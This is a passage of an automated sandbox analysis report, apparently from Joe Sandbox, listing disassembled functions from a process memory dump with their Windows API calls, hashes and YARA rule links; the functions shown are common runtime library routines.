                                                      Function 00007FF73AEBAD30 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                      • Instruction ID: cc19c55da2e28a24d2ced10e41e4f1f1670045d6bd23be60b0cefd6bd74ec3c4
                                                      • Opcode Fuzzy Hash: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                      • Instruction Fuzzy Hash: FEF0B276A08B8582EB20EB05F44631AFBA4F7D5788F500625EACC03B68CF7DD6559B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEBADA0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                      • Instruction ID: be703068668745205ab71540ab4981d6f08df3cb646413d8244b18bfdf4b5a2d
                                                      • Opcode Fuzzy Hash: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                      • Instruction Fuzzy Hash: 0AD0C971A18F8181D744EB16F88510AB7A4FBD5780F908425EAC942A28DF3CC2A98F40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00007FF73AF4A03C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF73AF3A9A0: GetLastError.KERNEL32(?,?,?,00007FF73AF3CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3), ref: 00007FF73AF3A9AF
                                                        • Part of subcall function 00007FF73AF3A9A0: SetLastError.KERNEL32(?,?,?,00007FF73AF3CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3), ref: 00007FF73AF3AA4D
                                                      • TranslateName.LIBCMT ref: 00007FF73AF4A0A9
                                                      • TranslateName.LIBCMT ref: 00007FF73AF4A0E4
                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF73AF3717C), ref: 00007FF73AF4A129
                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF73AF3717C), ref: 00007FF73AF4A151
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                      • String ID: utf8
                                                      • API String ID: 2136749100-905460609
                                                      • Opcode ID: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction ID: 108ca78dada77e88bf03ccff8b09028e787c4413f1196af397093f1811f353cd
                                                      • Opcode Fuzzy Hash: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                      • Instruction Fuzzy Hash: 4A91AF3AA09763A1FB24BF21D443AB9A3A4EF84B80F844271DA4D47785DF3DE551E720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF4AA70 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                      • String ID:
                                                      • API String ID: 3939093798-0
                                                      • Opcode ID: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction ID: 915fcef3ff0f0dfc461e6c94de27d52302126e58e288fcb956178f046a54d56f
                                                      • Opcode Fuzzy Hash: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                      • Instruction Fuzzy Hash: F271912AF08623A6FB50BB60D453AB9B3A1BF44744FC44275CA5D43695EF3CE445E360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF0D9D4 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      • Opcode ID: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction ID: e4f10630c618279c25c5af97e5d37faf6bb36aa7b24e17815429cd90937b3fa5
                                                      • Opcode Fuzzy Hash: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                      • Instruction Fuzzy Hash: 82315076609B8295FB60EF60E8413EDB3A4FB44744F84447ADA4E47A98EF3CD648C724
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF429E0 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 435049134-0
                                                      • Opcode ID: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                      • Instruction ID: 22047060323dbcbab1e5769cf51c38e10e11cacde32a4c89aaefa356c7dab784
                                                      • Opcode Fuzzy Hash: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                      • Instruction Fuzzy Hash: 95B1032AF18663A1F728FF22D8429B9E360BF94784F804175EE4C47A95DF3DE441A760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF34828 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1405656091-0
                                                      • Opcode ID: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                      • Instruction ID: 97c19b4120401134e3c27a95023fc1d5df1c99b3ac06a4456c397eafa84da337
                                                      • Opcode Fuzzy Hash: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                      • Instruction Fuzzy Hash: 4E91E4B6F046475BFB58AF25C9023B8A3A5EB5478AF848035DA0D8A7C9EF3DE4419710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF38900 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                      • Instruction ID: 9d420ac40e27f2bb23a7e13cc8ccca392009ab5cd5b0b3a127f1acc2b4d7ae39
                                                      • Opcode Fuzzy Hash: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                      • Instruction Fuzzy Hash: EB31BD36A04F8296EB60EF25E8413AE73A4FB88794F900175EA9D43B99DF3CD155CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEEAD60 Relevance: 7.8, APIs: 5, Instructions: 347COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID:
                                                      • API String ID: 3764944385-0
                                                      • Opcode ID: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                      • Instruction ID: fa98f9f582289fe582cbc5d20b47163e3f3d043328d412a62fe152d99414712f
                                                      • Opcode Fuzzy Hash: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                      • Instruction Fuzzy Hash: 6C0206366186458BE770EB19E482B2EB7E0F798754F504225FA8D87B98DB3CE940DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3C47C Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                      • String ID:
                                                      • API String ID: 1443284424-0
                                                      • Opcode ID: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                      • Instruction ID: b03f4362fd5a7518de99e912dfee97e1a0630a4a95954799c920d32ba01b068d
                                                      • Opcode Fuzzy Hash: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                      • Instruction Fuzzy Hash: 30E10F7AF18682AAF700DF64D4451ADBBB1FB447C8F808262DE4E57B98CE39D51AD310
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF42C74 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _get_daylight.LIBCMT ref: 00007FF73AF42CA2
                                                        • Part of subcall function 00007FF73AF423E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF423F4
                                                      • _get_daylight.LIBCMT ref: 00007FF73AF42CB3
                                                        • Part of subcall function 00007FF73AF42380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF42394
                                                      • _get_daylight.LIBCMT ref: 00007FF73AF42CC4
                                                        • Part of subcall function 00007FF73AF423B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF423C4
                                                        • Part of subcall function 00007FF73AF39294: HeapFree.KERNEL32(?,?,?,00007FF73AF48C78,?,?,?,00007FF73AF48FFB,?,?,00000019,00007FF73AF496D0,?,?,?,00007FF73AF49603), ref: 00007FF73AF392AA
                                                        • Part of subcall function 00007FF73AF39294: GetLastError.KERNEL32(?,?,?,00007FF73AF48C78,?,?,?,00007FF73AF48FFB,?,?,00000019,00007FF73AF496D0,?,?,?,00007FF73AF49603), ref: 00007FF73AF392BC
                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73AF42ED0), ref: 00007FF73AF42CEB
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 3458911817-0
                                                      • Opcode ID: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                      • Instruction ID: b2bbf36ff94b94f6eda9678221b16a20292ed1a1420501959d1e66d0f0dbcfd0
                                                      • Opcode Fuzzy Hash: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                      • Instruction Fuzzy Hash: CD61E43AA18A53A6F754FF21D8824B9E360FB58784FC041B5EA4D47A96DF3CE440A720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF428FC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                      • String ID: ?
                                                      • API String ID: 1286766494-1684325040
                                                      • Opcode ID: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
                                                      • Instruction ID: c7a4f75fcb7e37986bee38deb67b3b5fba2731452365f4d12380b4e666935765
                                                      • Opcode Fuzzy Hash: cf0eb1f6ca2243066e125b98a8636c984bae825e280b544a8dfa0c66d0da31ad
                                                      • Instruction Fuzzy Hash: 2191062AE0826365F728BF25C44267AA761EF90BE4F804171EE8C47AD5DF3DD482E750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF39934 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: InfoLocaletry_get_function
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2200034068-2904428671
                                                      • Opcode ID: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                      • Instruction ID: 267431425697ad9f592f5c1a081a0039060f514f56a57b64d360f2bf17b56277
                                                      • Opcode Fuzzy Hash: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                      • Instruction Fuzzy Hash: 5C01D669F08B4391FB00BB11B4520AAE260FF85BC0F944075DE5D13B95CE3CDA4297A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEEEE80 Relevance: 3.0, APIs: 2, Instructions: 36windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: e43a0246ca48c036b89a1bc6ecf8a36f86f99c51f42af5f9ead38ad86180ded0
                                                      • Instruction ID: 4485b5d524011c14d25348185a6ff40ed0328d799d07249d11ab613a83c27d3d
                                                      • Opcode Fuzzy Hash: e43a0246ca48c036b89a1bc6ecf8a36f86f99c51f42af5f9ead38ad86180ded0
                                                      • Instruction Fuzzy Hash: 85114836618B8292E720EB54F44635AF7A0FB94384F908579EA8D43B69DF7CD0488B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF39D50 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39D6B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39D8A
                                                        • Part of subcall function 00007FF73AF39378: GetProcAddress.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF394D0
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39DA9
                                                        • Part of subcall function 00007FF73AF39378: LoadLibraryW.KERNELBASE(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF3941B
                                                        • Part of subcall function 00007FF73AF39378: GetLastError.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF39429
                                                        • Part of subcall function 00007FF73AF39378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF3946B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39DC8
                                                        • Part of subcall function 00007FF73AF39378: FreeLibrary.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF394A4
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39DE7
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E06
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E25
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E44
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E63
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
